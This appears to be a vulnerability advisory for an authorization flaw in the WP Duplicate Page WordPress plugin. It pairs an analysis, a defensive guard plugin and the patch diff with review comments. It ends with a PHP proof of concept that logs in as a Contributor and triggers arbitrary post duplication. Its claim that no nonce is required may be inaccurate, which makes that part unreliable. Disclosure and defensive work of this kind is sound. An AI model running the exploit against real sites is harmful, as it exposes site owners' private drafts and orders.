Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14001: WP Duplicate Page <= 1.8 – Missing Authorization to Authenticated (Contributor+) Arbitrary Post Duplication (wp-duplicate-page)

Severity: Medium (CVSS 5.4)
CWE: 862
Vulnerable Version: 1.8
Patched Version: 1.8.1
Disclosed: January 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14001:
This vulnerability is a missing authorization flaw in the WP Duplicate Page WordPress plugin, affecting versions up to and including 1.8. It allows authenticated users with Contributor-level permissions or higher to duplicate arbitrary posts, pages, and WooCommerce HPOS orders, bypassing the plugin’s configured role restrictions. The CVSS score of 5.4 reflects a medium severity impact.

The root cause is the absence of a capability check in two bulk action handler functions. The `duplicateBulkHandle` function in `/wp-duplicate-page/includes/Classes/ButtonDuplicate.php` (line 53) and the `duplicateBulkHandleHPOS` function (line 78) process bulk duplication requests. Before the patch, these functions executed the duplication logic as soon as the action matched `'wp_duplicate_page_bulk_action'`. They did not verify that the current user was permitted to copy posts under the plugin's own `Utils::isCurrentUserAllowedToCopy()` method. This omission allowed users to bypass the plugin's "Allowed User Roles" setting.

An attacker exploits this by sending a POST request to the WordPress admin bulk actions endpoint. The attacker must be authenticated with at least Contributor privileges. The request targets the post list table in `/wp-admin/edit.php` or the WooCommerce orders page, submitting a bulk action with the name `wp_duplicate_page_bulk_action` and an array of target post or order IDs. No special nonce or additional parameters are required beyond the standard WordPress bulk action parameters, as the missing authorization check is the sole vulnerability.

The patch adds an authorization check at the start of both vulnerable functions. In `ButtonDuplicate.php`, lines 56 and 83 now call `if ( ! Utils::isCurrentUserAllowedToCopy() ) { return $redirect; }`. This method validates the user's role against the plugin's settings. The patch also updates the plugin version to 1.8.1 in `wp-duplicate-page.php`. Before the patch, any authenticated user triggering the bulk action could duplicate posts. After the patch, the function returns early if the user is not explicitly permitted by the plugin's configuration, preventing unauthorized duplication.

Successful exploitation leads to unauthorized data duplication. Attackers can duplicate any post, page, or WooCommerce order, potentially exposing sensitive information from drafts or private content. For WooCommerce sites, this could result in duplicate order fulfillment, causing logistical and financial issues. The vulnerability undermines the plugin’s role-based access control, allowing users to perform actions explicitly denied by the site administrator.
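As a defender-side illustration of the fix described above, the following must-use plugin is an added example written for this page; it is not code from Atomic Edge or from NinjaTeam's plugin. It enforces the same kind of guard the 1.8.1 patch adds, but from outside the plugin, so a site that cannot update immediately still refuses the bulk action for users who should not duplicate content, and it logs every refused attempt. Assumptions: it only covers the `/wp-admin/edit.php` path and the `post[]` parameter the analysis names (the HPOS orders path is left to the plugin update); because the namespace of the plugin's `Utils` class is not on this page, the WordPress capability `edit_others_posts` stands in for the plugin's "Allowed User Roles" setting, and the `NJT_DUPLICATE_VERSION` constant comes from the patched `wp-duplicate-page.php`.

```php
<?php
/**
 * Plugin Name: WP Duplicate Page bulk-action guard (added example, not part of the plugin)
 *
 * Place in wp-content/mu-plugins/. Must-use plugins load before regular
 * plugins, and the load-edit.php hook fires before edit.php runs its bulk
 * handlers, so this guard sees the request before the vulnerable handler does.
 */

// Capability treated as "allowed to copy". Constructed policy for this
// example; the real plugin consults its own Utils::isCurrentUserAllowedToCopy().
const WPDP_GUARD_REQUIRED_CAP = 'edit_others_posts';

/**
 * True when the request submits the plugin's bulk action.
 * WP_List_Table::current_action() reads 'action' first, then 'action2'.
 */
function wpdp_guard_is_bulk_duplicate_request( array $request ) {
    foreach ( array( 'action', 'action2' ) as $key ) {
        if ( isset( $request[ $key ] ) && 'wp_duplicate_page_bulk_action' === $request[ $key ] ) {
            return true;
        }
    }
    return false;
}

/**
 * Decide whether the current user may duplicate every requested post.
 * A role-level allow list alone is not enough: the user must also be able
 * to edit each individual post, otherwise drafts and private content of
 * other authors can be copied into the caller's own post list.
 */
function wpdp_guard_user_may_duplicate( array $post_ids ) {
    if ( ! current_user_can( WPDP_GUARD_REQUIRED_CAP ) ) {
        return false;
    }
    foreach ( array_map( 'intval', $post_ids ) as $post_id ) {
        if ( $post_id <= 0 || ! current_user_can( 'edit_post', $post_id ) ) {
            return false;
        }
    }
    return true;
}

add_action( 'load-edit.php', function () {
    // Only needed while a vulnerable build (<= 1.8) is installed.
    if ( ! defined( 'NJT_DUPLICATE_VERSION' )
        || version_compare( NJT_DUPLICATE_VERSION, '1.8.1', '>=' ) ) {
        return;
    }
    if ( ! wpdp_guard_is_bulk_duplicate_request( $_REQUEST ) ) {
        return;
    }

    $post_ids = ( ! empty( $_REQUEST['post'] ) && is_array( $_REQUEST['post'] ) )
        ? $_REQUEST['post']
        : array();

    if ( wpdp_guard_user_may_duplicate( $post_ids ) ) {
        return; // Permitted: let WordPress and the plugin proceed as usual.
    }

    // Detection: one log line per refused attempt with user, source and ids.
    error_log( sprintf(
        'wpdp-guard: blocked wp_duplicate_page_bulk_action by user %d from %s for post ids [%s]',
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown',
        implode( ',', array_map( 'intval', $post_ids ) )
    ) );

    wp_die(
        'You are not allowed to duplicate these items.',
        'Forbidden',
        array( 'response' => 403 )
    );
} );
```

The guard is deliberately stricter than the plugin's role setting: the per-post `edit_post` check is what stops a Contributor who is on the allow list from copying another author's private draft, which is the data-exposure outcome the analysis describes. Once the plugin is updated to 1.8.1 the version gate makes the guard a no-op, so it can be left in place without interfering with the fixed handler.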

Differential between vulnerable and patched code

Code Diff
--- a/wp-duplicate-page/includes/Classes/ButtonDuplicate.php
+++ b/wp-duplicate-page/includes/Classes/ButtonDuplicate.php
@@ -53,6 +53,9 @@

 	public function duplicateBulkHandle( $redirect, $action, $postIds ) {
 		if ( 'wp_duplicate_page_bulk_action' === $action ) {
+			if ( ! Utils::isCurrentUserAllowedToCopy() ) {
+				return $redirect;
+			}
 			// Get the original post
 			$counter = 0;
 			if ( is_array( $postIds ) ) {
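Review bot: the guard returns `$redirect` unchanged, so a denied user is sent back to the list with no indication that nothing was duplicated; appending a query arg (for example `add_query_arg( 'njt_duplicate_denied', 1, $redirect )`) would let an admin notice explain the refusal. The check is also role-level only: in the visible context the loop over `$postIds` accepts every id once `Utils::isCurrentUserAllowedToCopy()` passes, so a user on the allow list can still copy posts they cannot edit; a per-item `current_user_can( 'edit_post', ... )` inside the loop would close that.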
@@ -78,6 +81,9 @@

 	public function duplicateBulkHandleHPOS( $redirect, $action, $ids ) {
 		if ( 'wp_duplicate_page_bulk_action' === $action ) {
+			if ( ! Utils::isCurrentUserAllowedToCopy() ) {
+				return $redirect;
+			}
 			$counter = 0;
 			if ( is_array( $ids ) ) {
 				foreach ( $ids as $orderId ) {
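Review bot: this is the same three-line guard as in `duplicateBulkHandle`; with two copies, a later change to either handler (or a third bulk handler) can leave them out of step. Factoring the check into one private method called from both handlers keeps the paths in sync. The per-item point applies here too: `foreach ( $ids as $orderId )` runs for every submitted id once the role check passes, and nothing in the visible lines confirms the user may access each order.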
--- a/wp-duplicate-page/wp-duplicate-page.php
+++ b/wp-duplicate-page/wp-duplicate-page.php
@@ -1,9 +1,9 @@
 <?php
 /**
  * Plugin Name: WP Duplicate Page
- * Plugin URI: https://ninjateam.org/wp-duplicate-page/
+ * Plugin URI: https://ninjateam.org
  * Description: Duplicate Posts, Pages and Custom Post Types.
- * Version: 1.8
+ * Version: 1.8.1
  * Author: NinjaTeam
  * Author URI: https://ninjateam.org
  * Text Domain: wp-duplicate-page
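Review bot: the `Plugin URI` change from `https://ninjateam.org/wp-duplicate-page/` to `https://ninjateam.org` is unrelated to the authorization fix; bundling it into the security release makes the patch harder to audit and to backport. Keep 1.8.1 to the version bump and the new guard, and ship the URI edit separately.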
@@ -16,7 +16,7 @@

 defined( 'ABSPATH' ) || exit;

-define( 'NJT_DUPLICATE_VERSION', '1.8' );
+define( 'NJT_DUPLICATE_VERSION', '1.8.1' );
 define( 'NJT_DUPLICATE_DOMAIN', 'wp-duplicate-page' );

 define( 'NJT_DUPLICATE_PLUGIN_DIR', __DIR__ );
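Review bot: `NJT_DUPLICATE_VERSION` now has to be bumped in lockstep with the `Version:` header in the same file; one missed edit leaves the two disagreeing, which breaks any version gate keyed on the constant. Deriving the constant from the header with `get_file_data( __FILE__, array( 'Version' => 'Version' ) )`, or otherwise keeping a single source for the version string, avoids that drift.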

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14001 - WP Duplicate Page <= 1.8 - Missing Authorization to Authenticated (Contributor+) Arbitrary Post Duplication

$target_url = 'https://vulnerable-site.com';
$username = 'contributor';
$password = 'password';
$post_ids_to_duplicate = [123, 456]; // Array of target post/order IDs

// Initialize cURL session; the same handle is reused so the session cookies persist
$ch = curl_init();

// Step 1: Authenticate and obtain WordPress session cookies
$login_url = $target_url . '/wp-login.php';
$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save cookies to file
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Adjust for production

$response = curl_exec($ch);
if ($response === false) {
    echo "[-] Login request failed: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}

// Step 2: Perform bulk duplication action via POST to the posts list page
$bulk_action_url = $target_url . '/wp-admin/edit.php';
$post_fields = [
    'action' => 'wp_duplicate_page_bulk_action', // The vulnerable bulk action identifier
    'action2' => '-1',
    'post' => $post_ids_to_duplicate // http_build_query() encodes this as post[0]=..&post[1]=..
];

curl_setopt($ch, CURLOPT_URL, $bulk_action_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));

$response = curl_exec($ch);

// Check for success indicators. CURLOPT_FOLLOWLOCATION is enabled, so the
// final status code is that of the landing page; a redirect back to the
// list is detected via the redirect count instead of a literal 302.
$redirects = (int) curl_getinfo($ch, CURLINFO_REDIRECT_COUNT);
if ($response !== false
    && (strpos($response, 'Post duplicated successfully') !== false || $redirects > 0)) {
    echo "[+] Bulk duplication attempt executed.\n";
} else {
    echo "[-] Duplication may have failed or site is not vulnerable.\n";
}

curl_close($ch);
